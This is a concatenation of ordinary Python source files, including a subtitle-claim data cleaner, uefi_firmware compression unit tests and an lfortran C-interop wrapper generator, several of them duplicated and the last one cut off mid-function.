        ind = ind[np.argsort(x[ind])][::-1]  # sort ind by peak height
        idel = np.zeros(ind.size, dtype=bool)
        for i in range(ind.size):
            if not idel[i]:
                # keep peaks with the same height if kpsh is True
                idel = idel | (ind >= ind[i] - mpd) & (ind <= ind[i] + mpd) & (
                    x[ind[i]] > x[ind] if kpsh else True
                )
                idel[i] = 0  # Keep current peak
        # remove the small peaks and sort back the indices by their occurrence
        ind = np.sort(ind[~idel])
return ind | 0.513912 | 0.597197 |
import os
import re
import numpy as np
class DebattenAnnotatedDatacleaner:
    """
    Takes the annotated "Debatten" programs and extracts, per sentence, the
    cleaned text together with the highlighted (claim) spans.
    """

    def __init__(self, loc_ann=None, loc_out=None):
        # Input directory with annotated subtitle files / output directory.
        self.loc_ann_subtitles = loc_ann if loc_ann is not None else []
        self.loc_out_subtitles = loc_out if loc_out is not None else []

    def setAnnotatedFilesLocation(self, new_loc):
        self.loc_ann_subtitles = new_loc

    def setOutputFilesLocation(self, new_loc):
        self.loc_out_subtitles = new_loc

    def getFileLocation(self, disp=True):
        """Optionally print and return the configured input/output locations."""
        if disp:
            if not self.loc_ann_subtitles:
                print('Annotated subtitles are not specified!')
            else:
                print('Annotated subtitles are loaded from "{:s}"'.format(self.loc_ann_subtitles))
            if not self.loc_out_subtitles:
                print('Save location is not specified!')
            else:
                print('Save location is "{:s}"'.format(self.loc_out_subtitles))
        return self.loc_ann_subtitles, self.loc_out_subtitles

    def getFilePaths(self):
        """Full paths of every file in the annotated-subtitles directory."""
        files = os.listdir(self.loc_ann_subtitles)
        return [self.loc_ann_subtitles+f for f in files]

    def getProgramAndSentences(self,f_path):
        """Gets the program id, sentence ids and sentences from a document."""
        with open(f_path,'r') as f:
            doc = f.read()
        # Find program id
        m_program_id = re.compile(r'program[\d]+')
        m = re.search(m_program_id, doc)
        program_id = m.group()
        sentences = doc.split('<p ')
        m_sentence_id = re.compile(r'id="[\d]+">')
        # Finds the sentence ids and removes html stuff from the beginning of each sentence
        sentences_id = []
        for i in range(len(sentences)):
            match = re.search(m_sentence_id, sentences[i])
            if not match:
                sentences[i] = None
            else:
                sentences_id.append(int(match.group()[4:-2]))
                start_from = sentences[i].find('>')+1
                sentences[i] = sentences[i][start_from:]
        sentences = list(filter(None, sentences)) # Remove None elements
        assert(len(sentences)==len(sentences_id))
        return program_id, sentences_id, sentences

    # Finds highlighted text including its surrounding pattern
    def findHighlights(self,s):
        m_highlight = re.compile(r'<span id="highlight["\w\d ]+class="highlight[\w"]+>[\w\d. ,!?%]+</span>')
        return re.findall(m_highlight, s)

    # Extracts highlighted text only
    def extractHighlights(self, s_matches):
        m_high_text = re.compile(r'">[\w\d ,.!?%]+</')
        high_text = [re.findall(m_high_text, s_matches[i])[0][2:-2] for i in range(len(s_matches))]
        return [s.lstrip().rstrip() for s in high_text]

    # Removes html tags (and crap) from the string.
    def cleanSentence(self, s, disp=False):
        m_crap = re.compile(r'<[\w\d "=/]+>')
        s_crap_free = s
        for pattern in re.findall(m_crap, s):
            if disp: print(pattern)
            s_crap_free = s_crap_free.replace(pattern,'')
        s_crap_free = s_crap_free.replace('\t',' ') # removes tabs
        s_crap_free = re.sub(' +',' ', s_crap_free) # removes excess spaces
        return s_crap_free.lstrip().rstrip()

    def getHighlight_indices(self,s,s_highlighted):
        """Return [start, end] index pairs in *s* for each highlighted
        snippet, widened outward to whole-word boundaries."""
        # Two heuristics for correcting partially highlighted words.
        def getLeadingSpace(s,start_idx):
            # Finds first leading space before index "start_idx" in s
            if start_idx < 0:
                return 0
            elif s[start_idx] == ' ':  # '==' not 'is': string identity is a CPython interning artefact
                return start_idx+1
            else:
                return getLeadingSpace(s,start_idx-1)
        def getTailingSpace(s,end_idx):
            # Finds first trailing space after index "end_idx" in s
            if end_idx >= len(s):
                return len(s)
            elif s[end_idx] == ' ' or end_idx == len(s):
                return end_idx
            else:
                return getTailingSpace(s,end_idx+1)
        # Find the indices of highlighted words
        indices = []
        for m in s_highlighted:
            # re.escape: highlights are literal text and may contain regex
            # metacharacters such as '.', '?' or '!'.
            match = re.search(re.escape(m), s)
            if match:
                indices.append([getLeadingSpace(s, match.start()),
                                getTailingSpace(s, match.end())])
            else:
                print(match)
                print(m)
                print(s_highlighted)
                print(s+'\n')
                #print('\n\n')
        return indices

    def getCleanedProgramSentences(self, sentences):
        """Clean every sentence and collect its highlight texts and index pairs."""
        sentences_processed = [None]*len(sentences)
        sentences_highlight = [None]*len(sentences)
        sentences_highlight_ind = [None]*len(sentences)
        for i in range(len(sentences)):
            sen = sentences[i]
            raw_highlights = self.findHighlights(sen)
            text_highlights = self.extractHighlights(raw_highlights)
            # Crap free version
            sentences_processed[i] = self.cleanSentence(sen)
            indices_highlights = self.getHighlight_indices(sentences_processed[i],
                                                           text_highlights)
            sentences_highlight_ind[i] = indices_highlights
            for idx in indices_highlights:
                if sentences_highlight[i]:
                    sentences_highlight[i] = sentences_highlight[i]+ ' [new claim]: '\
                                             +sentences_processed[i][idx[0]:idx[1]]
                else:
                    sentences_highlight[i] = sentences_processed[i][idx[0]:idx[1]]
        return sentences_processed, sentences_highlight, sentences_highlight_ind

    # EXPERIMENTAL!!! Processing multi-claim paragraphs
    def processMultiClaim(self,s,idx):
        """Merge adjacent highlight spans; join distinct ones with ' [new claim]: '."""
        merge_claims = []
        for c in range(len(idx)-1):
            if abs(idx[c][1]-idx[c+1][0]) == 1: # It is the same claim
                merge_claims.append(True)
            else:
                merge_claims.append(False)
        new_s = []
        new_idx = []
        for c in range(len(idx)-1):
            if merge_claims[c]:
                start_id = idx[c][0]
                end_id = idx[c+1][1]
                new_idx.append([start_id, end_id])
                new_s.append(s[start_id:end_id])
            else:
                if c > 0:
                    new_s.append(' [new claim]: ')
                start_id = idx[c][0]
                end_id = idx[c][1]
                new_idx.append([start_id, end_id])
                new_s.append(s[start_id:end_id])
        if not merge_claims[-1]:
            new_s.append(' [new claim]: ')
            start_id = idx[-1][0]
            end_id = idx[-1][1]
            new_idx.append([start_id, end_id])
            new_s.append(s[start_id:end_id])
        new_s = ''.join(new_s)
        return new_s, new_idx

    def getAllCleanedProgramSentences(self,disp=False):
        """Process every annotated file; return (rows, column labels)."""
        file_paths = self.getFilePaths()
        all_program_id = [None]*len(file_paths)
        all_sentences = [None]*len(file_paths)
        all_sentences_id = [None]*len(file_paths)
        all_highlights = [None]*len(file_paths)
        all_highlights_ind = [None]*len(file_paths)
        total_claims = 0
        total_sentences = 0
        for f in range(len(file_paths)):
            all_program_id[f], all_sentences_id[f], sentences = \
                self.getProgramAndSentences(file_paths[f])
            if disp: print('Program id {:s}'.format(all_program_id[f]))
            all_sentences[f], all_highlights[f], all_highlights_ind[f] = \
                self.getCleanedProgramSentences(sentences)
            num_claims = len(list(filter(None,all_highlights[f])))
            if disp: print('\tThere were {:d} claims out of {:d} sentences ({:2.2f}%)'.format(num_claims
                            ,len(sentences), num_claims/float(len(sentences))*100))
            total_claims = total_claims+num_claims
            total_sentences = total_sentences + len(sentences)
        if disp: print('\nIn total there were {:d} claims out of {:d} sentences ({:2.2f}%)'.format(total_claims
                        , total_sentences, total_claims/float(total_sentences)*100))
        # Flatten the per-program results into one row per sentence.
        labels = ['program_id', 'sentence_id', 'sentence', 'claim_idx', 'claim']
        data = [ [None]*len(labels) for i in range(total_sentences)]
        i = 0
        for p in range(len(all_program_id)):
            for si in range(len(all_sentences[p])):
                data[i][0] = all_program_id[p]
                data[i][1] = all_sentences_id[p][si]
                data[i][2] = all_sentences[p][si]
                if len(all_highlights_ind[p][si]) == 1:
                    data[i][3] = all_highlights_ind[p][si]
                    data[i][4] = all_highlights[p][si]
                elif all_highlights_ind[p][si]:
                    # Multiple highlight spans in one sentence: try the
                    # experimental merge and ask the operator to verify.
                    print('HELP')
                    print(all_program_id[p])
                    print(all_highlights_ind[p][si])
                    print(all_highlights[p][si])
                    new_s, new_idx = self.processMultiClaim(all_sentences[p][si],
                                                            all_highlights_ind[p][si])
                    print('Trying to handle this multi-claim, is the output correct?')
                    print(new_idx)
                    print(new_s)
                    print()
                    data[i][3] = new_idx
                    data[i][4] = new_s
                i = i+1
        return data, labels
import re
import numpy as np
class DebattenAnnotatedDatacleaner:
    """
    Takes the annotated "Debatten" programs and extracts, per sentence, the
    cleaned text together with the highlighted (claim) spans.
    """

    def __init__(self, loc_ann=None, loc_out=None):
        # Input directory with annotated subtitle files / output directory.
        self.loc_ann_subtitles = loc_ann if loc_ann is not None else []
        self.loc_out_subtitles = loc_out if loc_out is not None else []

    def setAnnotatedFilesLocation(self, new_loc):
        self.loc_ann_subtitles = new_loc

    def setOutputFilesLocation(self, new_loc):
        self.loc_out_subtitles = new_loc

    def getFileLocation(self, disp=True):
        """Optionally print and return the configured input/output locations."""
        if disp:
            if not self.loc_ann_subtitles:
                print('Annotated subtitles are not specified!')
            else:
                print('Annotated subtitles are loaded from "{:s}"'.format(self.loc_ann_subtitles))
            if not self.loc_out_subtitles:
                print('Save location is not specified!')
            else:
                print('Save location is "{:s}"'.format(self.loc_out_subtitles))
        return self.loc_ann_subtitles, self.loc_out_subtitles

    def getFilePaths(self):
        """Full paths of every file in the annotated-subtitles directory."""
        files = os.listdir(self.loc_ann_subtitles)
        return [self.loc_ann_subtitles+f for f in files]

    def getProgramAndSentences(self,f_path):
        """Gets the program id, sentence ids and sentences from a document."""
        with open(f_path,'r') as f:
            doc = f.read()
        # Find program id
        m_program_id = re.compile(r'program[\d]+')
        m = re.search(m_program_id, doc)
        program_id = m.group()
        sentences = doc.split('<p ')
        m_sentence_id = re.compile(r'id="[\d]+">')
        # Finds the sentence ids and removes html stuff from the beginning of each sentence
        sentences_id = []
        for i in range(len(sentences)):
            match = re.search(m_sentence_id, sentences[i])
            if not match:
                sentences[i] = None
            else:
                sentences_id.append(int(match.group()[4:-2]))
                start_from = sentences[i].find('>')+1
                sentences[i] = sentences[i][start_from:]
        sentences = list(filter(None, sentences)) # Remove None elements
        assert(len(sentences)==len(sentences_id))
        return program_id, sentences_id, sentences

    # Finds highlighted text including its surrounding pattern
    def findHighlights(self,s):
        m_highlight = re.compile(r'<span id="highlight["\w\d ]+class="highlight[\w"]+>[\w\d. ,!?%]+</span>')
        return re.findall(m_highlight, s)

    # Extracts highlighted text only
    def extractHighlights(self, s_matches):
        m_high_text = re.compile(r'">[\w\d ,.!?%]+</')
        high_text = [re.findall(m_high_text, s_matches[i])[0][2:-2] for i in range(len(s_matches))]
        return [s.lstrip().rstrip() for s in high_text]

    # Removes html tags (and crap) from the string.
    def cleanSentence(self, s, disp=False):
        m_crap = re.compile(r'<[\w\d "=/]+>')
        s_crap_free = s
        for pattern in re.findall(m_crap, s):
            if disp: print(pattern)
            s_crap_free = s_crap_free.replace(pattern,'')
        s_crap_free = s_crap_free.replace('\t',' ') # removes tabs
        s_crap_free = re.sub(' +',' ', s_crap_free) # removes excess spaces
        return s_crap_free.lstrip().rstrip()

    def getHighlight_indices(self,s,s_highlighted):
        """Return [start, end] index pairs in *s* for each highlighted
        snippet, widened outward to whole-word boundaries."""
        # Two heuristics for correcting partially highlighted words.
        def getLeadingSpace(s,start_idx):
            # Finds first leading space before index "start_idx" in s
            if start_idx < 0:
                return 0
            elif s[start_idx] == ' ':  # '==' not 'is': string identity is a CPython interning artefact
                return start_idx+1
            else:
                return getLeadingSpace(s,start_idx-1)
        def getTailingSpace(s,end_idx):
            # Finds first trailing space after index "end_idx" in s
            if end_idx >= len(s):
                return len(s)
            elif s[end_idx] == ' ' or end_idx == len(s):
                return end_idx
            else:
                return getTailingSpace(s,end_idx+1)
        # Find the indices of highlighted words
        indices = []
        for m in s_highlighted:
            # re.escape: highlights are literal text and may contain regex
            # metacharacters such as '.', '?' or '!'.
            match = re.search(re.escape(m), s)
            if match:
                indices.append([getLeadingSpace(s, match.start()),
                                getTailingSpace(s, match.end())])
            else:
                print(match)
                print(m)
                print(s_highlighted)
                print(s+'\n')
                #print('\n\n')
        return indices

    def getCleanedProgramSentences(self, sentences):
        """Clean every sentence and collect its highlight texts and index pairs."""
        sentences_processed = [None]*len(sentences)
        sentences_highlight = [None]*len(sentences)
        sentences_highlight_ind = [None]*len(sentences)
        for i in range(len(sentences)):
            sen = sentences[i]
            raw_highlights = self.findHighlights(sen)
            text_highlights = self.extractHighlights(raw_highlights)
            # Crap free version
            sentences_processed[i] = self.cleanSentence(sen)
            indices_highlights = self.getHighlight_indices(sentences_processed[i],
                                                           text_highlights)
            sentences_highlight_ind[i] = indices_highlights
            for idx in indices_highlights:
                if sentences_highlight[i]:
                    sentences_highlight[i] = sentences_highlight[i]+ ' [new claim]: '\
                                             +sentences_processed[i][idx[0]:idx[1]]
                else:
                    sentences_highlight[i] = sentences_processed[i][idx[0]:idx[1]]
        return sentences_processed, sentences_highlight, sentences_highlight_ind

    # EXPERIMENTAL!!! Processing multi-claim paragraphs
    def processMultiClaim(self,s,idx):
        """Merge adjacent highlight spans; join distinct ones with ' [new claim]: '."""
        merge_claims = []
        for c in range(len(idx)-1):
            if abs(idx[c][1]-idx[c+1][0]) == 1: # It is the same claim
                merge_claims.append(True)
            else:
                merge_claims.append(False)
        new_s = []
        new_idx = []
        for c in range(len(idx)-1):
            if merge_claims[c]:
                start_id = idx[c][0]
                end_id = idx[c+1][1]
                new_idx.append([start_id, end_id])
                new_s.append(s[start_id:end_id])
            else:
                if c > 0:
                    new_s.append(' [new claim]: ')
                start_id = idx[c][0]
                end_id = idx[c][1]
                new_idx.append([start_id, end_id])
                new_s.append(s[start_id:end_id])
        if not merge_claims[-1]:
            new_s.append(' [new claim]: ')
            start_id = idx[-1][0]
            end_id = idx[-1][1]
            new_idx.append([start_id, end_id])
            new_s.append(s[start_id:end_id])
        new_s = ''.join(new_s)
        return new_s, new_idx

    def getAllCleanedProgramSentences(self,disp=False):
        """Process every annotated file; return (rows, column labels)."""
        file_paths = self.getFilePaths()
        all_program_id = [None]*len(file_paths)
        all_sentences = [None]*len(file_paths)
        all_sentences_id = [None]*len(file_paths)
        all_highlights = [None]*len(file_paths)
        all_highlights_ind = [None]*len(file_paths)
        total_claims = 0
        total_sentences = 0
        for f in range(len(file_paths)):
            all_program_id[f], all_sentences_id[f], sentences = \
                self.getProgramAndSentences(file_paths[f])
            if disp: print('Program id {:s}'.format(all_program_id[f]))
            all_sentences[f], all_highlights[f], all_highlights_ind[f] = \
                self.getCleanedProgramSentences(sentences)
            num_claims = len(list(filter(None,all_highlights[f])))
            if disp: print('\tThere were {:d} claims out of {:d} sentences ({:2.2f}%)'.format(num_claims
                            ,len(sentences), num_claims/float(len(sentences))*100))
            total_claims = total_claims+num_claims
            total_sentences = total_sentences + len(sentences)
        if disp: print('\nIn total there were {:d} claims out of {:d} sentences ({:2.2f}%)'.format(total_claims
                        , total_sentences, total_claims/float(total_sentences)*100))
        # Flatten the per-program results into one row per sentence.
        labels = ['program_id', 'sentence_id', 'sentence', 'claim_idx', 'claim']
        data = [ [None]*len(labels) for i in range(total_sentences)]
        i = 0
        for p in range(len(all_program_id)):
            for si in range(len(all_sentences[p])):
                data[i][0] = all_program_id[p]
                data[i][1] = all_sentences_id[p][si]
                data[i][2] = all_sentences[p][si]
                if len(all_highlights_ind[p][si]) == 1:
                    data[i][3] = all_highlights_ind[p][si]
                    data[i][4] = all_highlights[p][si]
                elif all_highlights_ind[p][si]:
                    # Multiple highlight spans in one sentence: try the
                    # experimental merge and ask the operator to verify.
                    print('HELP')
                    print(all_program_id[p])
                    print(all_highlights_ind[p][si])
                    print(all_highlights[p][si])
                    new_s, new_idx = self.processMultiClaim(all_sentences[p][si],
                                                            all_highlights_ind[p][si])
                    print('Trying to handle this multi-claim, is the output correct?')
                    print(new_idx)
                    print(new_s)
                    print()
                    data[i][3] = new_idx
                    data[i][4] = new_s
                i = i+1
        return data, labels
import unittest
import struct
from uefi_firmware import efi_compressor
class CompressionTest(unittest.TestCase):
    """Exercises the efi_compressor codecs on a highly compressible payload."""

    def _test_compress(self, compress_algorithm):
        # Compress 720 bytes of 'A' and validate the 8-byte size header.
        payload = b"AAAAAAAA" * 90
        packed = compress_algorithm(payload, len(payload))
        self.assertTrue(packed is not None)
        self.assertGreater(len(packed), 8)
        body_size, _orig_size = struct.unpack("<II", packed[:8])
        self.assertEqual(len(packed) - 8, body_size)

    def _test_decompress(self, compress_algorithm, decompress_algorithm):
        # Round-trip: decompressing the compressed payload must restore it.
        payload = b"AAAAAAAA" * 90
        packed = compress_algorithm(payload, len(payload))
        restored = decompress_algorithm(packed, len(packed))
        self.assertTrue(restored is not None)
        self.assertEqual(len(restored), len(payload))
        self.assertEqual(restored, payload)

    def test_efi_compress(self):
        self._test_compress(efi_compressor.EfiCompress)

    def test_efi_decompress(self):
        self._test_decompress(efi_compressor.EfiCompress, efi_compressor.EfiDecompress)

    def test_tiano_compress(self):
        self._test_compress(efi_compressor.TianoCompress)

    def test_tiano_decompress(self):
        self._test_decompress(efi_compressor.TianoCompress, efi_compressor.TianoDecompress)

    def test_lzma_compress(self):
        # Only existence of the compressed output is asserted here.
        payload = b"AAAAAAAA" * 90
        packed = efi_compressor.LzmaCompress(payload, len(payload))
        self.assertTrue(packed is not None)

    def test_lzma_decompress(self):
        payload = b"AAAAAAAA" * 90
        packed = efi_compressor.LzmaCompress(payload, len(payload))
        restored = efi_compressor.LzmaDecompress(packed, len(packed))
        self.assertTrue(restored is not None)
        self.assertEqual(len(restored), len(payload))
        self.assertEqual(restored, payload)
# Allow running this test module directly as a script.
if __name__ == '__main__':
    unittest.main()
import struct
from uefi_firmware import efi_compressor
class CompressionTest(unittest.TestCase):
    """Exercises the efi_compressor codecs on a highly compressible payload."""

    def _test_compress(self, compress_algorithm):
        # Compress 720 bytes of 'A' and validate the 8-byte size header.
        payload = b"AAAAAAAA" * 90
        packed = compress_algorithm(payload, len(payload))
        self.assertTrue(packed is not None)
        self.assertGreater(len(packed), 8)
        body_size, _orig_size = struct.unpack("<II", packed[:8])
        self.assertEqual(len(packed) - 8, body_size)

    def _test_decompress(self, compress_algorithm, decompress_algorithm):
        # Round-trip: decompressing the compressed payload must restore it.
        payload = b"AAAAAAAA" * 90
        packed = compress_algorithm(payload, len(payload))
        restored = decompress_algorithm(packed, len(packed))
        self.assertTrue(restored is not None)
        self.assertEqual(len(restored), len(payload))
        self.assertEqual(restored, payload)

    def test_efi_compress(self):
        self._test_compress(efi_compressor.EfiCompress)

    def test_efi_decompress(self):
        self._test_decompress(efi_compressor.EfiCompress, efi_compressor.EfiDecompress)

    def test_tiano_compress(self):
        self._test_compress(efi_compressor.TianoCompress)

    def test_tiano_decompress(self):
        self._test_decompress(efi_compressor.TianoCompress, efi_compressor.TianoDecompress)

    def test_lzma_compress(self):
        # Only existence of the compressed output is asserted here.
        payload = b"AAAAAAAA" * 90
        packed = efi_compressor.LzmaCompress(payload, len(payload))
        self.assertTrue(packed is not None)

    def test_lzma_decompress(self):
        payload = b"AAAAAAAA" * 90
        packed = efi_compressor.LzmaCompress(payload, len(payload))
        restored = efi_compressor.LzmaDecompress(packed, len(packed))
        self.assertTrue(restored is not None)
        self.assertEqual(len(restored), len(payload))
        self.assertEqual(restored, payload)
# Allow running this test module directly as a script.
if __name__ == '__main__':
    unittest.main()
import sys
sys.path.append("../..")
from lfortran.asr import asr
from lfortran.asr.asr_check import verify_asr
from lfortran.asr.asr_to_ast import asr_to_ast
from lfortran.ast.ast_to_src import ast_to_src
from lfortran.adapters.gfortran.mod import mod_to_asr
from lfortran.asr.builder import (make_translation_unit,
translation_unit_make_module, scope_add_function, make_type_integer,
make_type_real, type_eq, make_binop, scope_add_symbol, Scope,
function_make_var, array_is_assumed_shape)
class NodeTransformer(asr.NodeTransformerBase):
    """Deep-copying ASR transformer.

    Rebuilds scopes, sequences and nodes recursively.  The `_lookup` flag
    controls how VariableOld nodes are handled:
      0 -- copy the variable,
      1 -- resolve it in the current scope (used inside function bodies),
      2 -- resolve it if already present, otherwise copy (used while a
           scope is being rebuilt).
    """
    def visit_scope(self, symtab, parent=None):
        # Rebuild a symbol table; symbols are visited in resolve-or-copy mode.
        new_symtab = Scope(parent)
        self._lookup = 2
        self._scope = new_symtab
        for s, sym in symtab.symbols.items():
            new_symtab.symbols[s] = self.visit(sym)
        self._lookup = 0
        return new_symtab
    def visit_sequence(self, seq):
        # Visit a possibly-None list of nodes; None maps to an empty list.
        r = []
        if seq is not None:
            for node in seq:
                r.append(self.visit(node))
        return r
    def visit_object(self, o):
        # Dispatch on the plain-Python values that can appear in node fields.
        if isinstance(o, Scope):
            return self.visit_scope(o)
        elif isinstance(o, list):
            return self.visit_sequence(o)
        elif isinstance(o, (str, int)) or o is None:
            return o
        else:
            print(type(o))
            raise NotImplementedError()
    def visit_Function(self, node):
        name = self.visit_object(node.name)
        symtab = self.visit_object(node.symtab)
        # Args/body/return_var must reference the copied scope's variables.
        self._lookup = 1
        self._scope = symtab
        args = self.visit_sequence(node.args)
        body = self.visit_sequence(node.body)
        return_var = self.visit(node.return_var)
        self._lookup = 0
        if node.bind:
            bind = self.visit(node.bind)
        else:
            bind = None
        return asr.Function(name=name, args=args, body=body, bind=bind, return_var=return_var, symtab=symtab)
    def visit_VariableOld(self, node):
        if self._lookup == 1:
            return self._scope.resolve(node.name)
        elif self._lookup == 2:
            v = self._scope.resolve(node.name, raise_exception=False)
            if v:
                return v
        name = self.visit_object(node.name)
        intent = self.visit_object(node.intent)
        dummy = self.visit_object(node.dummy)
        type = self.visit(node.type)
        return asr.VariableOld(name=name, intent=intent, dummy=dummy, type=type)
class WrapperVisitor(NodeTransformer):
    """Rewrite a module into a C-interoperability wrapper module.

    Each function gets a bind(c) companion `<name>_c_wrapper` bound to the
    mangled symbol `__<module>_MOD_<name>`, and the original body is
    replaced by a single call to it.  Assumed-shape array arguments are
    routed through the `c_desc1_int32` / `c_desc2_int32` descriptor
    constructors of the `gfort_interop` module.
    """
    def visit_Module(self, node):
        # Wrapper module gets a fixed name; the original name is kept only
        # for symbol mangling in visit_Function.
        name = "mod2" #node.name + "_wrapper"
        self._modname = node.name
        symtab = self.visit_scope(node.symtab)
        return asr.Module(name=name, symtab=symtab)
    def visit_Function(self, node):
        name = self.visit_object(node.name)
        symtab = self.visit_object(node.symtab)
        # Resolve variables against the freshly copied scope.
        self._lookup = 1
        self._scope = symtab
        args = self.visit_sequence(node.args)
        body = self.visit_sequence(node.body)
        self._lookup = 0
        if node.bind:
            bind = self.visit(node.bind)
        else:
            bind = None
        # Placeholder return variable: function_make_var needs the Function
        # node to exist before the real return variable can be attached.
        tmp = asr.VariableOld(name="a", type=make_type_integer())
        f = asr.Function(name=name, args=args, body=body, bind=bind,
            symtab=symtab, return_var=tmp)
        return_var = function_make_var(f, name="r", type=self.visit(node.return_var.type))
        return_var.dummy = True
        f.return_var = return_var
        cname = node.name + "_c_wrapper"
        # Matches gfortran's module-procedure name mangling.
        mangled_name = '__' + self._modname + '_MOD_' + node.name.lower()
        bind = asr.Bind(lang="c", name=mangled_name)
        cargs = []
        args2 = []
        # Dummy 1-D / 2-D integer array types, used only to declare the
        # signatures of the descriptor helper functions below.
        type1 = make_type_integer()
        type1.dims = [asr.dimension(asr.Num(n=1, type=make_type_integer()))]
        type2 = make_type_integer()
        type2.dims = [
            asr.dimension(asr.Num(n=1, type=make_type_integer())),
            asr.dimension(asr.Num(n=1, type=make_type_integer()))
        ]
        c_desc1 = scope_add_function(
            symtab,
            "c_desc1_int32",
            args=[
                asr.VariableOld(
                    name="A",
                    intent="in",
                    type=type1
                )
            ],
            return_var=asr.VariableOld(
                name="c_desc1_int32",
                type=asr.Derived(name="c_desc1_t")
            ),
            module = "gfort_interop"
        )
        c_desc2 = scope_add_function(
            symtab,
            "c_desc2_int32",
            args=[
                asr.VariableOld(
                    name="A",
                    intent="in",
                    type=type2
                )
            ],
            return_var=asr.VariableOld(
                name="c_desc2_int32",
                type=asr.Derived(name="c_desc2_t")
            ),
            module = "gfort_interop"
        )
        for arg in node.args:
            type = self.visit(arg.type)
            if array_is_assumed_shape(type):
                # Assumed-shape arrays cross the C boundary as descriptor
                # structs; wrap the argument in the matching constructor call.
                if len(type.dims) == 1:
                    dname = "c_desc1_t"
                    fname = c_desc1
                elif len(type.dims) == 2:
                    dname = "c_desc2_t"
                    fname = c_desc2
                else:
                    raise NotImplementedError("Too many dimensions")
                type = asr.Derived(name=dname, module="gfort_interop")
                args2.append(asr.FuncCall(func=fname, args=[arg],
                    keywords=[], type=type))
            else:
                args2.append(arg)
            cargs.append(asr.VariableOld(
                name=arg.name,
                intent=arg.intent,
                type=type,
            ))
        # Declare the bind(c) companion and make the wrapper's body a single
        # assignment: r = <name>_c_wrapper(...).
        fw = scope_add_function(symtab, cname, args=cargs, return_var=cname)
        fw.bind = bind
        body = [
            asr.Assignment(return_var,
                asr.FuncCall(func=fw, args=args2, keywords=[],
                    type=fw.return_var.type)
            )
        ]
        f.body = body
        return f
def create_wrapper(u):
    """Build the C-interop wrapper module for translation unit *u* and
    verify the resulting ASR before returning it."""
    wrapped = WrapperVisitor().visit(u)
    verify_asr(wrapped)
    return wrapped
# Load a gfortran module file, convert ASR -> AST -> source, then build the
# wrapper module and render it as well; the final print follows below.
u = mod_to_asr("mod1.mod")
a = asr_to_ast(u)
s = ast_to_src(a)
#print(s)
u2 = create_wrapper(u)
a = asr_to_ast(u2)
s = ast_to_src(a)
#print("-"*80)
print(s) | integration_tests/interop/wrap2.py | import sys
sys.path.append("../..")
from lfortran.asr import asr
from lfortran.asr.asr_check import verify_asr
from lfortran.asr.asr_to_ast import asr_to_ast
from lfortran.ast.ast_to_src import ast_to_src
from lfortran.adapters.gfortran.mod import mod_to_asr
from lfortran.asr.builder import (make_translation_unit,
translation_unit_make_module, scope_add_function, make_type_integer,
make_type_real, type_eq, make_binop, scope_add_symbol, Scope,
function_make_var, array_is_assumed_shape)
class NodeTransformer(asr.NodeTransformerBase):
    """Deep-copying ASR transformer.

    Rebuilds scopes, sequences and nodes recursively.  The `_lookup` flag
    controls how VariableOld nodes are handled:
      0 -- copy the variable,
      1 -- resolve it in the current scope (used inside function bodies),
      2 -- resolve it if already present, otherwise copy (used while a
           scope is being rebuilt).
    """
    def visit_scope(self, symtab, parent=None):
        # Rebuild a symbol table; symbols are visited in resolve-or-copy mode.
        new_symtab = Scope(parent)
        self._lookup = 2
        self._scope = new_symtab
        for s, sym in symtab.symbols.items():
            new_symtab.symbols[s] = self.visit(sym)
        self._lookup = 0
        return new_symtab
    def visit_sequence(self, seq):
        # Visit a possibly-None list of nodes; None maps to an empty list.
        r = []
        if seq is not None:
            for node in seq:
                r.append(self.visit(node))
        return r
    def visit_object(self, o):
        # Dispatch on the plain-Python values that can appear in node fields.
        if isinstance(o, Scope):
            return self.visit_scope(o)
        elif isinstance(o, list):
            return self.visit_sequence(o)
        elif isinstance(o, (str, int)) or o is None:
            return o
        else:
            print(type(o))
            raise NotImplementedError()
    def visit_Function(self, node):
        name = self.visit_object(node.name)
        symtab = self.visit_object(node.symtab)
        # Args/body/return_var must reference the copied scope's variables.
        self._lookup = 1
        self._scope = symtab
        args = self.visit_sequence(node.args)
        body = self.visit_sequence(node.body)
        return_var = self.visit(node.return_var)
        self._lookup = 0
        if node.bind:
            bind = self.visit(node.bind)
        else:
            bind = None
        return asr.Function(name=name, args=args, body=body, bind=bind, return_var=return_var, symtab=symtab)
    def visit_VariableOld(self, node):
        if self._lookup == 1:
            return self._scope.resolve(node.name)
        elif self._lookup == 2:
            v = self._scope.resolve(node.name, raise_exception=False)
            if v:
                return v
        name = self.visit_object(node.name)
        intent = self.visit_object(node.intent)
        dummy = self.visit_object(node.dummy)
        type = self.visit(node.type)
        return asr.VariableOld(name=name, intent=intent, dummy=dummy, type=type)
class WrapperVisitor(NodeTransformer):
    """Rewrite a module into a C-interoperability wrapper module.

    Each function gets a bind(c) companion `<name>_c_wrapper` bound to the
    mangled symbol `__<module>_MOD_<name>`, and the original body is
    replaced by a single call to it.  Assumed-shape array arguments are
    routed through the `c_desc1_int32` / `c_desc2_int32` descriptor
    constructors of the `gfort_interop` module.
    """
    def visit_Module(self, node):
        # Wrapper module gets a fixed name; the original name is kept only
        # for symbol mangling in visit_Function.
        name = "mod2" #node.name + "_wrapper"
        self._modname = node.name
        symtab = self.visit_scope(node.symtab)
        return asr.Module(name=name, symtab=symtab)
    def visit_Function(self, node):
        name = self.visit_object(node.name)
        symtab = self.visit_object(node.symtab)
        # Resolve variables against the freshly copied scope.
        self._lookup = 1
        self._scope = symtab
        args = self.visit_sequence(node.args)
        body = self.visit_sequence(node.body)
        self._lookup = 0
        if node.bind:
            bind = self.visit(node.bind)
        else:
            bind = None
        # Placeholder return variable: function_make_var needs the Function
        # node to exist before the real return variable can be attached.
        tmp = asr.VariableOld(name="a", type=make_type_integer())
        f = asr.Function(name=name, args=args, body=body, bind=bind,
            symtab=symtab, return_var=tmp)
        return_var = function_make_var(f, name="r", type=self.visit(node.return_var.type))
        return_var.dummy = True
        f.return_var = return_var
        cname = node.name + "_c_wrapper"
        # Matches gfortran's module-procedure name mangling.
        mangled_name = '__' + self._modname + '_MOD_' + node.name.lower()
        bind = asr.Bind(lang="c", name=mangled_name)
        cargs = []
        args2 = []
        # Dummy 1-D / 2-D integer array types, used only to declare the
        # signatures of the descriptor helper functions below.
        type1 = make_type_integer()
        type1.dims = [asr.dimension(asr.Num(n=1, type=make_type_integer()))]
        type2 = make_type_integer()
        type2.dims = [
            asr.dimension(asr.Num(n=1, type=make_type_integer())),
            asr.dimension(asr.Num(n=1, type=make_type_integer()))
        ]
        c_desc1 = scope_add_function(
            symtab,
            "c_desc1_int32",
            args=[
                asr.VariableOld(
                    name="A",
                    intent="in",
                    type=type1
                )
            ],
